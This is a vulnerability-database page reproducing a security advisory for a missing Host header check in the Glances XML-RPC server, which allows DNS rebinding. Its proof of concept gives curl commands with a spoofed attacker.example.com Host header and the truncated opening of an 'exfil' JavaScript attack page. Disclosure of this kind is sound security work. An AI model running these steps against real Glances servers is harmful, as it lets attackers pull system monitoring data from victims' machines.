🛡️ CVE-2026-46611 — glances

🟡 CVSS 5.3 — Medium ✅ No Known Exploit CWE-346 NVD
5.3
CVSS Score
0 Low4 Medium7 High9 Critical10

Description

Glances: XML-RPC Server Missing Host Header Validation Enables DNS Rebinding Attack

Summary

The Glances XML-RPC server (glances -s, implemented in glances/server.py) does not validate the HTTP Host header, leaving it vulnerable to DNS rebinding attacks. CVE-2026-32632 (patched in 4.5.2) added TrustedHostMiddleware to the REST/WebUI server; the MCP server has had equivalent protection since 4.5.1. The XML-RPC server received neither fix and has no allowed-hosts configuration key. Combined with the unrestricted Access-Control-Allow-Origin: * header (see companion advisory for CVE-2026-33533 and its incomplete fix), an attacker can exploit DNS rebinding to exfiltrate the full system monitoring dataset from a victim's browser.

Details

Affected component: glances/server.pyGlancesXMLRPCHandler / GlancesXMLRPCServer

Direct URL (commit 04579778e733d705898a169e049dc84772c852da):

  • https://github.com/nicolargo/glances/blob/04579778e733d705898a169e049dc84772c852da/glances/server.py

Contrast — patched backends:

  • https://github.com/nicolargo/glances/blob/04579778e733d705898a169e049dc84772c852da/glances/outputs/glances_restful_api.py
  • https://github.com/nicolargo/glances/blob/04579778e733d705898a169e049dc84772c852da/glances/outputs/glances_mcp.py

The GlancesXMLRPCHandler class inherits from Python's xmlrpc.server.SimpleXMLRPCRequestHandler and does not override parse_request() to inspect or validate the Host header.

Contrast this with the two other Glances server backends, both of which received host-validation hardening:

REST / WebUI server (glances/outputs/glances_restful_api.py) — patched in 4.5.2:

```python

# glances_restful_api.py

if self.webui_allowed_hosts:

self._app.add_middleware(

TrustedHostMiddleware,

allowed_hosts=self.webui_allowed_hosts,

)

```

MCP server (glances/outputs/glances_mcp.py) — protected since 4.5.1:

```python

# glances_mcp.py

TransportSecuritySettings(

allowed_hosts=self.mcp_allowed_hosts,

...

)

```

XML-RPC server (glances/server.py) — no equivalent exists:

```python

class GlancesXMLRPCHandler(SimpleXMLRPCRequestHandler, GlancesAPI):

# No Host header check; any Host value is accepted

rpc_paths = ('/RPC2',)

...

```

There is no xmlrpc_allowed_hosts (or equivalent) configuration key in glances.conf, and the server ignores the Host header on every incoming request.

Confirmed on: x86_64 Linux, Python 3.13, Glances 4.5.5_dev1 (commit 04579778e733d705898a169e049dc84772c852da).

Test results:

| Server type | Host header | HTTP status | Data returned |

|-------------|----------------------|-------------|---------------|

| XML-RPC | attacker.example.com | 200 OK | Yes — VULNERABLE |

| XML-RPC | 127.0.0.1:61209 | 200 OK | Yes (baseline) |

| REST API | attacker.example.com | 400 Bad Request | No — patched |

PoC

Attack overview

DNS rebinding breaks the browser Same-Origin Policy by making attacker.example.com temporarily resolve to the target's IP address (e.g. 127.0.0.1). From that point the victim's browser treats the attacker's page as same-origin with http://attacker.example.com:61209/RPC2, forwarding the attacker-controlled Host header to the local Glances XML-RPC server, which accepts it without validation.

Special configuration required

No special glances.conf settings are needed. The vulnerability is present in a default Glances XML-RPC server start (glances -s). For the comparison test (Step 3) the REST server must also be started; that step requires Glances to be installed with web dependencies (pip install "glances[web]").

Step 1 — Start the Glances XML-RPC server

```bash

glances -s -p 61209

```

Step 2 — Confirm the server accepts an arbitrary Host header

```bash

curl -s -D - -X POST "http://127.0.0.1:61209/RPC2" \

-H "Host: attacker.example.com" \

-H "Content-Type: text/plain" \

-d '<?xml version="1.0"?>

<methodCall><methodName>getAllPlugins</methodName></methodCall>'

```

Expected result (secure): HTTP/1.0 400 Bad Request

Actual result: HTTP/1.0 200 OK with full XML-RPC response body.

Step 3 — Confirm the REST API is patched (comparison)

```bash

# Start REST server with the same machine as allowed host:

glances -w -p 61210 --webui-port 61210

curl -s -o /dev/null -w "%{http_code}\n" \

"http://127.0.0.1:61210/api/4/status" \

-H "Host: attacker.example.com"

# Returns: 400 (TrustedHostMiddleware rejects the spoofed Host)

```

Step 4 — Full DNS rebinding exploitation (real-world path)

1. Attacker registers attacker.example.com with a low-TTL (1 second) DNS record initially pointing to their own server IP.

2. Attacker serves the following page from http://attacker.example.com:

```html

<script>

async function exfil() {

const payload = `<?xml version="1.0"?>

<methodCall><methodName>getAll</methodName></methodCall>`;

try

How this vulnerability can be exploited

This issue can be reached over the network, attack complexity is high, an attacker needs no privileges on the target. A user must be tricked into taking some action. The scope is unchanged, so the impact stays within the vulnerable component. Rated impact: confidentiality high, integrity none, availability none.

Weakness class

CVE-2026-46611 is classified as CWE-346: Origin Validation Error. The origin of a message or request is not verified properly, so one source can pose as another.

Affected software

CVE-2026-46611 is recorded against 2 packages.

  • glances (fixed in 4.5.5)
  • unknown

Timeline and source

Published on 22 June 2026 and last revised on 21 July 2026. No public exploit is currently recorded for this entry. Record sourced from NVD.

References

github.com (Web)
nvd.nist.gov (Advisory)
github.com (Advisory)
github.com (Package)
github.com (Web)
github.com (Web)
pypi.org (Web)

Details

Severity Medium
CVSS Score 5.3
CVSS Vector CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:N/A:N
CWE CWE-346
Public Exploit ✅ No
Source NVD
Published 2026-06-22
Updated 2026-08-12
Modified 2026-07-21
Fix URL N/A

Affected Packages

Software From version Fixed in
glances 4.5.5
unknown

Similar Threats

Vulnerability Monitoring

Track new vulnerabilities in glances

CVE-2026-46611 is rated CVSS 5.3 Medium. BotEraser monitors your WordPress installation and notifies you when software you use appears in our vulnerability database.

Set Up Free Alerts →

No credit card required  ·  Results in minutes

ⓘ Data Notice: The information presented above has been compiled from publicly available internet sources. Boteraser aggregates this data solely for informational purposes and does not independently classify, evaluate, or endorse any findings about the vulnerabilities listed. The accuracy and completeness of this information is the sole responsibility of the original publishers. Boteraser and its operators accept no liability for any decisions made based on this data.